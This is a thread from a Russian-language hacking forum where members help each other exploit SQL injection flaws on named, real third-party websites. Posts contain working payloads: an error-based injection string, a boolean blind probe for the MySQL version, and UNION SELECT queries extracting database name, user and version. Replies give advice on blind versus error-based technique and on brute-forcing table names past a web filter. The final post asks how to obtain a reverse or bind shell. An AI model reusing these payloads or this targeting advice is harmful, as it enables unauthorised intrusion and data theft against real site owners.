Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    закрыт
     
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.aua.gr/probata/index.php?id=11))+/*+
    хелп
     
  3. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Сходу вывод не получил.
    Вслепую вектор будет следующим:
    4 версия mysql, смотрите на временную задержку
     
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Слепую то я раскрутил, нужен вывод...

    //блин, дак так и ставьте вопрос YaBtr
     
    #23884 DezMond™, 20 Feb 2015
    Last edited by a moderator: 20 Feb 2015
    1 person likes this.
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    я думал, может кто колонки подберёт, тут 2 подзапроса
     
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Совместно с faza02 и YaBtr:

    Есть таблица images (одно из полей - image_id, второе - image). Доступна mysql.

    Error-based:
    Code:
    [I]id=1%20or%201%29%[/I][I]29%20gro[/I][I]up%20by[/I][I]%20c[/I][I]oncat%28vers[/I][I]ion%28%29,fl[/I][I]oor%28ra[/I][I]nd%280[/I][I]%29*2х[/I][I]%29%29%20[/I][I]having%20min%2[/I][I]80%29%2[/I][I]0or%201/*+[/I]
    
    Подзапросы не работают. Составить запрос для прямого вывода из таблицы пока не удалось.
     
    #23886 randman, 20 Feb 2015
    Last edited: 20 Feb 2015
    1 person likes this.
  7. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Как правильно обратиться к таблице mysql ?
     
  8. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    error-based вектора для вывода для версии mysql 4.0 не существует на данный момент. в данной ситуации только time-based. однако у этого пользователя file_priv n
     
    _________________________
  9. Simpliest

    Simpliest New Member

    Joined:
    29 Apr 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    не пойму что за sql-inj такая тут

    http://il2.aviasibir.ru/mow/?page=squads&squad_id=4+and+1=1
    http://il2.aviasibir.ru/mow/?page=squads&squad_id=4

    вроде есть, а вроде и нет...
     
  10. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    мда, совсем не соображаю
     
    _________________________
    #23890 yarbabin, 21 Feb 2015
    Last edited: 21 Feb 2015
  11. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Как вам такой вариант, коллега ?

    _http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=5 TRUE

    _http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=4 FALSE
     
    _________________________
    #23891 BigBear, 21 Feb 2015
    Last edited: 21 Feb 2015
    2 people like this.
  12. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Не могу добраться к БД:
    Code:
    http://ukrcrewing.com.ua/-agency%27%20union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21  --%20+
     
  13. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    69
    Likes Received:
    6
    Reputations:
    10
    есть ли здесь уязвимость?
     
  14. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Code:
    ukrcrewing.com.ua/agency ('union select 1,concat(database(),0x3a,version(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--')
     
  15. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц
     
  16. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    452
    Likes Received:
    265
    Reputations:
    40
    Это Opencart, нет ничего.
     
    2 people like this.
  17. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    waf на точку, у меня обойти не вышло. пробуйте подбирать таблицы перебором
     
    _________________________
  18. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    154
    Likes Received:
    15
    Reputations:
    6
    Парни,я понял что blind sql injection - это сначала запрос вида
    select count(*) from pages where id=...
    а потом
    select * from pages where id=...
    В случае если первый запрос возвращает 0 -происходит редирект.
    Вопрос. Как часто происходит редирект в blind sql injection
     
  19. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    Ерунду какую-то написал. Твои запросы - это обычная union инъекция. Блайнд - это отсутствие вывода, через select ты ничего не выведешь, ты можешь только проверить истинность или ложность выражения. Учи матчасть.
     
  20. Export

    Export Member

    Joined:
    13 Feb 2010
    Messages:
    69
    Likes Received:
    5
    Reputations:
    9
    Скажите: как мне заюзать бекконект или биндпорт, если shell_exec не работает, а следовательно Perl bind.pl не приводит к нужному результату.
     
Thread Status:
Not open for further replies.